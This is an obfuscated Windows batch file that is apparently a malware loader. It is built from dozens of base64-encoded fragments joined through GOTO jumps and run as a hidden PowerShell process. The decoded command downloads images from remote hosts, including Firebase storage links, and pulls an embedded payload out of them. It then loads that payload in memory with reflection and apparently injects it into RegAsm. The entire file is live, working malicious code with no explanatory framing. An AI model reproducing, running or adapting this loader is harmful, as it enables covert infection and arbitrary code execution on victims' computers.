@echo off
GOTO INDGFDNOGI
:SNJDHJJIOG
SET IGIOSKFUDU=ce($ddsdgo, ''f#'', ''r'')));iex $oWjfdsuxd\"'"
GOTO GGOSUFFIOJ
:DJFGINFNNN
SET FINNGJNSDJ=ACAAIAAgACAAJABzAGgAdQBmAGYAbABlAGQATABpAG4AawBzACAAPQAgAEcAZQB0
GOTO IJNIFNNKFF
:DIDNNIDDND
SET DJUJNOGIDG=QAIAAtAEYAaQByAHMAdAAgADUAIAB8ACAARgBvAHIAbQBhAHQALQBUAGEAYgBsAGUAIABOAGE
GOTO FIGDFDGOJN1
:DJGIKGNOFI
SET FIGGNDGDII=gByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2A
GOTO JJDIIJOOIJ
:NJDIDIFGOG
SET UIDNIJDGNG=gBKAGwAVABqAEcAeQBLAFcAcQBBAGMATgAnACkAKQA7ACAAIAAgACAAIAAgACAAIAAN
GOTO OODDOGGGFN
:GGOSUFFIOJ
                    
GOTO FIINGJGNID
:DFKIIDUUOO
SET NHIGJOOGOG=ANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIA
GOTO NGSFNOJSDD
:GDKOGUHUGJ
SET DOKIOFDNDK=CcAZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwB
GOTO FSSONIFIOF
:FOGOFFDIOD
SET NGJUFDDDGS=AIAAgACAAIAAgACAAIAAgACAAIAAkAGkAbgBqAGUAYwA9ACcAUgBlAGcAJwAgACsAIAAnAEEAcw
GOTO NNJNDUDISF0
:INGJJOOKSI
SET KFDGGFNJIF=IAAgACAAIAAgACQAbABmAHMAZABmAHMAZABnACAAPQAgACAAJABCAHkAdABlAHMAIAAf#ACQAQgB5AH
GOTO NJIIONUDFJ9
:DIINGSFOSH
SET GGHFIGGGID=AAZwA/AGEAbAB0AD0AbQBlAGQAaQBhACYAdABvAGsAZQBuAD0ANgBlAGMAZAA2AGYAM
GOTO UGKDNNOJHN5
:DKOOKNDISD
SET DFFFDONOND=AGEAcwBlADYANABMAGUAbgBnAHQAaABoACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAg
GOTO OIOFIUGGOI5
:NNJNDUDISF
SET OIGGDNIDFN=ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGYAdQBuAGMAdABpAG8AbgAgAEQAbw
GOTO DDINOFDNFS0
:OIOFIUGGOI
SET DOSNFFNDNG=yAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQ
GOTO DSIFIGDFGK
:IIGOGNJFDG
SET OKGIINSFFJ=AWwBzAHQAcgBpAG4AZwBbAF0AXQAkAGwAaQBuAGsAcwApACAADQAKACAAIAAgACAAIA
GOTO GIGGGFJFNN
:IJNIFNNKFF
SET GOGFGDGNID=AC0AUgBhAG4AZABvAG0AIAAtAEkAbgBwAHUAdABPAGIAagBlAGMAdAAgACQAbABpAG4
GOTO DDINOFDNFS7
:OODDOGGGFN
SET FDISUNDGJI=AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAbQBhAGcAZQBCAHkAdABl
GOTO JDGSIIFNDG
:NNSDGDIFGI
SET DSDDNJGSFD=hAGcAKQA7ACAAIAAgACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AH
GOTO DSIFIGDFGK3
:FSSONIFIOF
SET SFFDISSDND=vAG0ALwB2ADAALwBiAC8AaABvAGwAZAAtADgAZgBhAGQANQAuAGYAaQByAGUAYgBhAHMAZQ
GOTO UGKDNNOJHN3
:IJJNFDDNGD
SET KGDGNJUDDD=AAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbAB
GOTO NNSDGDIFGI
:NGSFNOJSDD
SET DOOGNDFIDG=bwBjAGUAcwBzACAAfAAgAFMAbwByAHQALQBPAGIAagBlAGMAdAAgAEMAUABVACAALQBEAGU
GOTO DDFKGJOJJO
:HSDFHNJGFD
SET IKJGOGINDO=AAIAAgACAAIABpAGYAIAAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAC0Abg
GOTO IFONDIGJGG4
:IDOGNFGJOF
SET ISGJNSOODI=ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABCAHkAdABlAHMAMgAg
GOTO NJIIONUDFJ7
:GNFJKDGHDS
SET GSNINHNOFN=AAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBOAGUAdAAuAFMAZQB
GOTO OIOFIUGGOI
:NNJNDUDISF0
SET DJNDJHOFNN=BtACcAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIA
GOTO NNJNDUDISF1
:GNFJKDGHDS3
SET FDDFFGHDFS=AgACAAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAA
GOTO GNFJKDGHDS4
:FIGDFDGOJN
SET NJUFHJUGIG=MAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgANAAoAIAAg
GOTO NNJNDUDISF
:NJIIONUDFJ
SET UGOSDFOSFD=indowStyle Hidden -ArgumentList '-Command \"$ddsdgo = ''DQAKACAAI
GOTO UGKDNNOJHN
:OIOFIUGGOI8
SET DDSUOIFSGD=4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAR
GOTO DJGIKGNOFI
:OIOFIUGGOI7
SET HFGFJGFGKG=AAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG
GOTO OIOFIUGGOI8
:GNFJKDGHDS1
SET GKUOJGFDUN=AJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBn
GOTO GNFJKDGHDS2
:NNJNDUDISF6
SET KSIIOGNGGD=AvAC8AOgBzACcALAAgACcAMAAnACwAIAAnACcALAAgACQAaQBuAGoAZQBjACwAIAAnADAAJwAgAC
GOTO NNJNDUDISF7
:DODIFDFODG
SET KGIGGIINSI=gAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4A
GOTO DGSDIGNOON
:GNFJKDGHDS7
SET NJJGOGGUOI=QAYQByAHQASQBuAGQAZQB4ACkAIAB7ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABz
GOTO GNFJKDGHDS8
:NNJNDUDISF1
SET GODGGSNODI=AgACQAbQBlAHQAaABvAGQAIAA9ACAAJAB0AHkAcABlAC4ARwBlAHQATQBlAHQAaABvAGQAK
GOTO NNJNDUDISF2
:KDGGONSOIS
SET DFNNINODFO=CAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHMAdABhA
GOTO IFONDIGJGG8
:OOIOIOHFSJ
SET GOGFIHKGNF=MAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBl
GOTO IFONDIGJGG6
:GNFJKDGHDS2
SET GGGOSNSDNO=ACkAOwAgAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIA
GOTO GNFJKDGHDS3
:GSGGSFGNGO
SET OFOFGKOFOD=lADcAMgAxADcAJwApACwAKAAkAGwAZgBzAGQAZgBzAGQAZwAgACsAIAAnAGEAdQA3ADIAbgB1AHgAe
GOTO SFGDJOONFS
:JJDIIJOOIJ
SET OFOHODFFGH=DQAQwBvAG0AbQBhAG4AZAApADsAIAAgACAAJABlAG4AZABJAG4AZABlAHgAIAA9AC
GOTO IJJNFDDNGD
:NNJNDUDISF5
SET UODDIGGDDS=bQBvAGMALgB0AG4AZQB0AG4AbwBjAHIAZQBzAHUAYgB1AGgAdABpAGcALgB3AGEAcg
GOTO NNJNDUDISF6
:DDFKGJOJJO
SET FJSDHFGJHG=AcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAH
GOTO DIDNNIDDND
:INDGFDNOGI
SET SNDFFDDGOD=%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell.exe -Command "St
GOTO DDINOFDNFS
:NJIIONUDFJ0
SET KGINGNOGGG=cwApACAAewAgAHQAcgB5ACAAewAgAHIAZQB0AHUAcgBuACAAJAB3AGUAYgBDAGwAaQB
GOTO NJIIONUDFJ1
:SFGDJOONFS
SET JJGJGKIDHI=gB2ADIALgB1AGYAcwAuAHMAaAAvAGYALwA0AEwAaABWADUAQgAxAHMARABDAHcASQ
GOTO UGKDNNOJHN8
:SFSFFHFGGJ
SET DJFJONNOFO=IAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGI
GOTO GGOUFGINJD
:NJIIONUDFJ7
SET FIDGIGFJDJ=AD0AIAAnAHMAOgAvAC8AJwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAA
GOTO INGJJOOKSI
:GNFJKDGHDS6
SET NDFNOIKJNG=gAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAH
GOTO GNFJKDGHDS7
:NNNONFJJNN
SET JNGNJIIIFN=tAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOw
GOTO DFKIIDUUOO
:NJIIONUDFJ9
SET NODSNOOGGN=QAZQBzADIAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAg
GOTO UGKDNNOJHN0
:JDGSIIFNDG
SET GGINFGIOGD=AHMAIAA9ACAARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEARgByAG8AbQBMAGkAbgBf#AHM
GOTO DFJNGSSGDF
:NNJNDUDISF7
SET GIDGOGDNNG=wAIAAnAHgANgA0ACcAKQApAH0AfQA='';$oWjfdsuxd = [system.Text.en
GOTO NNJNDUDISF8
:FIGDFDGOJN2
SET ODGJGFNUJJ=AAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAH
GOTO FIGDFDGOJN3
:FIGDFDGOJN4
SET GFODNDGDSJ=UAZQBzACcAKQA7AA0ACgANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAg
GOTO FIGDFDGOJN5
:GGOUFGINJD
SET GSOUDFNSNK=AbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQB
GOTO NNNONFJJNN
:UGKDNNOJHN
SET UIGJOONNDO=AAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABTAHQAYQByA
GOTO IFONDIGJGG
:UGKDNNOJHN3
SET IFSDOGNHGJ=BzAHQAbwByAGEAZwBlAC4AYQBwAHAALwBvAC8AZgBvAHIAcwB0ACUAMgBGAHAAaQBjADgALgBqAH
GOTO DIINGSFOSH
:GIGGGFJFNN
SET JIIDJNIOGD=AgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQA
GOTO DODIFDFODG
:FIINGJGNID
SET OSNFFIGSII=  
GOTO DDINOFDNFS02
:DFJNGSSGDF
SET OGJNJSNNOI=AIAAkAGwAaQBuAGsAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC
GOTO HSDFHNJGFD
:NJIIONUDFJ3
SET FNGNIFFGHK=AAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AH
GOTO NJIIONUDFJ4
:IFONDIGJGG
SET DFONNONGIU=HQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzAA0ACgAgACAAIAAgAC
GOTO GNFJKDGHDS
:NJIIONUDFJ5
SET ODJIONNJNI=AgACAAIAAgACAAIAAgACAAIAAkAEIAeQB0AGUAcwAgAD0AIAAnAGgAdAB0AHAAJwA7AA0ACgAg
GOTO IDOGNFGJOF
:OIOFIUGGOI3
SET GOGIFKGJGG=HQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABi
GOTO DKOOKNDISD
:NNJNDUDISF3
SET GNSNOIJSJD=FsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgBkAHIAZQBuAC8AbgBpAGEAbQAvAHMAZA
GOTO NNJNDUDISF4
:FIGDFDGOJN7
SET SGOONKIIDK=GUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADUAIAB8ACAARgBvAHIAbQB
GOTO FIGDFDGOJN8
:GNFJKDGHDS4
SET OUNJKIFGKO=uAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7AA0ACgAgACAAIAAgACAAIAAgACA
GOTO GNFJKDGHDS5
:FIGDFDGOJN5
SET GJDIOIGONI=ACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAAfAAgAFMAbwByAHQALQBP
GOTO FIGDFDGOJN6
:UGKDNNOJHN5
SET FIDSNHJOFU=gA1AC0ANgBhADcANwAtADQANgBkADIALQA5ADcANQBjAC0AYgBjADQAMwA5ADQAYwB
GOTO GSGGSFGNGO
:OIOFIUGGOI5
SET JOFGOFGJGG=ACAAIAAgACAAIAAgACAAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQ
GOTO OIOFIUGGOI6
:OIOFIUGGOI2
SET NGJSSODJNO=ABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4A
GOTO OIOFIUGGOI3
:NNJNDUDISF4
SET SGINGUGIIK=BhAGUAaAAvAHMAZgBlAHIALwA3ADMAMwAxAC8AOAAyADcANAA2ADIAMwA4ADIAMwAxAC8A
GOTO NNJNDUDISF5
:OIOFIUGGOI1
SET FFNNOOIJGG=AoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJ
GOTO OIOFIUGGOI2
:NJIIONUDFJ1
SET FGOGONDHJO=lAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABsAGkAbgBf#ACkAIAB9
GOTO NJIIONUDFJ2
:NJIIONUDFJ4
SET FDIFGJGGJF=UAcgBuACAAJABuAHUAbABsACAAfQA7ACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIA
GOTO NJIIONUDFJ5
:FIGDFDGOJN6
SET GUSSJOFNGJ=AGIAagBlAGMAdAAgAEMAUABVACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsA
GOTO FIGDFDGOJN7
:OIOFIUGGOI6
SET NUGDDGIDFN=BUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsADQAKACAAI
GOTO OIOFIUGGOI7
:IFONDIGJGG4
SET GNSHOOJDKG=BlACAAJABuAHUAbABsACkAIAB7ACAAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAF
GOTO OOIOIOHFSJ
:GNFJKDGHDS9
SET GFIFNDDDIU=gACAAIAAgACAAIAAgACAAIAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAaAAgA
GOTO OIOFIUGGOI0
:IFONDIGJGG9
SET UONGFDFDSH=DQAXwBTAFQAQQBSAFQAPgA+ACcAOwAgACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPA
GOTO GNFJKDGHDS0
:NNJNDUDISF2
SET SOIJODOFGG=AAnAHIAdQBuAHMAJwAgACsAIAAnAHMAJwApAC4ASQBuAHYAbwBf#AGUAKAAkAG4AdQBsAGwALAAgA
GOTO NNJNDUDISF3
:DGSDIGNOON
SET FGFNJUINDO=VwBlAGIAQwBsAGkAZQBuAHQAOwAgAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAg
GOTO DJFGINFNNN
:NJIIONUDFJ2
SET JDONFKNSDD=ACAAYwBhAHQAYwBoACAAewAgAGMAbwBuAHQAaQBuAHUAZQAgAH0AIAB9ADsAIAANAAoAI
GOTO NJIIONUDFJ3
:GNFJKDGHDS5
SET DDOKDINNFF=AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA
GOTO GNFJKDGHDS6
:GNFJKDGHDS8
SET FFSDNOGNNK=AHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAA
GOTO GNFJKDGHDS9
:DDINOFDNFS
SET DINJIUGION=art-Process %SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell.exe -W
GOTO NJIIONUDFJ
:IFONDIGJGG6
SET JUISNSSUDS=AHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7AA0ACgAgA
GOTO KDGGONSOIS
:DSIFIGDFGK
SET NIDIDHGNGI=ByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAG
GOTO FIGDFDGOJN
:DSIFIGDFGK3
SET FHIGNUGDGN=QALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwANAAoAIAAgACAAIAAgACAA
GOTO SFSFFHFGGJ
:IFONDIGJGG8
SET OOODKSNNIS=HIAdABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQAnACAAKwAgACcAUwBFACcAIAAf#ACAAJwA2A
GOTO IFONDIGJGG9
:NNJNDUDISF8
SET JSNJFIOHKI=coding]::Unicode.GetString([system.convert]::Frombase64string([regex]::Repla
GOTO SNJDHJJIOG
:GNFJKDGHDS0
SET SGJIKJGFDG=BCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACA
GOTO GNFJKDGHDS1
:DDINOFDNFS9
SET FOKGJIDSFO=IAAoACQAbABpAG4AawAgAGkAbgAgACQAcwBoAHUAZgBmAGwAZQBkAEwAaQBuAGsA
GOTO NJIIONUDFJ0
:FIGDFDGOJN8
SET GGHSDNGNSN=hAHQALQBUAGEAYgBsAGUAIABOAGEAbQBlACwAQwBQAFUADQAKACAAIAAgACAAIAAgACAAIAAgACA
GOTO FOGOFFDIOD
:DDINOFDNFS02
%SNDFFDDGOD%%DINJIUGION%%UGOSDFOSFD%%UIGJOONNDO%%DFONNONGIU%%GSNINHNOFN%%DOSNFFNDNG%%NIDIDHGNGI%%NJUFHJUGIG%%OIGGDNIDFN%%DDOINSUKIG%%OKGIINSFFJ%%JIIDJNIOGD%%KGIGGIINSI%%FGFNJUINDO%%FINNGJNSDJ%%GOGFGDGNID%%JGNFUIIKON%%NDIDDNDNID%%FOKGJIDSFO%%KGINGNOGGG%%FGOGONDHJO%%JDONFKNSDD%%FNGNIFFGHK%%FDIFGJGGJF%%ODJIONNJNI%%ISGJNSOODI%%FIDGIGFJDJ%%KFDGGFNJIF%%NODSNOOGGN%%FOFDNGIJDI%%DOKIOFDNDK%%SFFDISSDND%%IFSDOGNHGJ%%GGHFIGGGID%%FIDSNHJOFU%%OFOFGKOFOD%%JJGJGKIDHI%%SGFKFKGDOG%%UIDNIJDGNG%%FDISUNDGJI%%GGINFGIOGD%%OGJNJSNNOI%%IKJGOGINDO%%GNSHOOJDKG%%GOGFIHKGNF%%JUISNSSUDS%%DFNNINODFO%%OOODKSNNIS%%UONGFDFDSH%%SGJIKJGFDG%%GKUOJGFDUN%%GGGOSNSDNO%%FDDFFGHDFS%%OUNJKIFGKO%%DDOKDINNFF%%NDFNOIKJNG%%NJJGOGGUOI%%FFSDNOGNNK%%GFIFNDDDIU%%OGDIFONIOU%%FFNNOOIJGG%%NGJSSODJNO%%GOGIFKGJGG%%DFFFDONOND%%JOFGOFGJGG%%NUGDDGIDFN%%HFGFJGFGKG%%DDSUOIFSGD%%FIGGNDGDII%%OFOHODFFGH%%KGDGNJUDDD%%DSDDNJGSFD%%FHIGNUGDGN%%DJFJONNOFO%%GSOUDFNSNK%%JNGNJIIIFN%%NHIGJOOGOG%%DOOGNDFIDG%%FJSDHFGJHG%%DJUJNOGIDG%%ONGOFDNFNO%%ODGJGFNUJJ%%NSSGOOFGDN%%GFODNDGDSJ%%GJDIOIGONI%%GUSSJOFNGJ%%SGOONKIIDK%%GGHSDNGNSN%%NGJUFDDDGS%%DJNDJHOFNN%%GODGGSNODI%%SOIJODOFGG%%GNSNOIJSJD%%SGINGUGIIK%%UODDIGGDDS%%KSIIOGNGGD%%GIDGOGDNNG%%JSNJFIOHKI%%IGIOSKFUDU%%OSNFFIGSII%
GOTO DDINOFDNFS03
:FIGDFDGOJN1
SET ONGOFDNFNO=AbQBlACwAQwBQAFUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC
GOTO FIGDFDGOJN2
:DDINOFDNFS0
SET DDOINSUKIG=B3AG4AbABvAGEAZABEAGEAdABhAEYAcgBvAG0ATABpAG4AawBzACAAewAgAHAAYQByAGEAbQAgACg
GOTO IIGOGNJFDG
:OIOFIUGGOI0
SET OGDIFONIOU=D0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwANA
GOTO OIOFIUGGOI1
:UGKDNNOJHN0
SET FOFDNGIJDI=ACQAbABpAG4AawBzACAAPQAgAEAAKAAoACQAbABmAHMAZABmAHMAZABnACAAKwAgA
GOTO GDKOGUHUGJ
:UGKDNNOJHN8
SET SGFKFKGDOG=BIAGYAQgBNAGEAdgBpAG0AVgAxAHcAWQBMAEQAcwAzADcAcABCADkAMABJAG4AU
GOTO NJDIDIFGOG
:FIGDFDGOJN3
SET NSSGOOFGDN=kALgBHAGUAdABUAHkAcABlACgAJwBtAHkAcAByAG8AZwByAGEAbQAuAEgAbwBtAG
GOTO FIGDFDGOJN4
:DDINOFDNFS7
SET JGNFUIIKON=AawBzACAALQBDAG8AdQBuAHQAIAAkAGwAaQBuAGsAcwAuAEwAZQBuAGcAdABoADsAIAANAAo
GOTO DDINOFDNFS8
:DDINOFDNFS8
SET NDIDDNDNID=AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGYAbwByAGUAYQBjAGgA
GOTO DDINOFDNFS9
:DDINOFDNFS03
